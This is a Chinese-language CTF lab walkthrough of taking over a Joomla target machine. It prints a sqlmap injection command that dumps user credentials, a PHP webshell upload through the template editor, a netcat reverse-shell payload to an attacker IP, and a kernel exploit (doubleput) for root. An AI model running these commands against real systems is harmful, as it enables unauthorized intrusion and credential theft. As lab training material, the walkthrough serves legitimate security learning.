扫描获取靶机ip
nmap扫描开放端口
只开放了80端口,访问一下,是一个joomla的cms
vulhub有关于这个的漏洞,rce的那个没找到exp,试试失去了注入的poc
说明存在注入,放sqlmap里跑一下
sqlmap -u 'http://192.168.101.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=' -D joomladb -T '#__users' -C name,password,username --dump
john破解密码
把mysql密码的hash保存到一个文件中
得到密码,登录一下试试
没有什么发现,上网找一下joomla的后台页面
访问试试,成功进入后台
输入账号密码登录,成功登录
搜搜joomla后台怎么拿shell
这里用第二种方法
后面改了mime类型和扩展名都不行,图片马也不行,尝试用其他方法
选择第一个
点击new file
文件名为1后缀为php
写入一句话木马
访问一下试试 路径:template/beez3/html/1.php
蚁剑连接
反弹一个shell
尝试了各种反弹命令都失败了,是一下访问反弹,蚁剑创建一个文件,写入如下语句
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.101.76 4444 >/tmp/f');?>
浏览器访问成功反弹
获取一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看内核版本,搜索exp
wget下载
这里没有下载成功
直接把那两个c文件复制过来
本地开启一个web服务
在/var/www/html目录下创建那两个c文件把代码复制过来
反弹shell终端wget下载
根据exp的教程编译执行
经过一番尝试失败
换另一个exp
使用msf
这个也不行。不会用,菜鸡的无奈。。。。。。
上网搜wp
cat /etc/issue #查看linux版本
搜索kali内的exp
使用39772.txt
进入到39772的路径下
查看txt
下载这个zip
unzip解压这个文件
tar -xvf解压exploit.tar
执行compile.sh这个文件
再执行doubleput这个文件,成功获取root权限(刚开始再本地解压执行compile.sh这个文件不行,必须在靶机上执行)
切换到root目录,成功获取flag
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。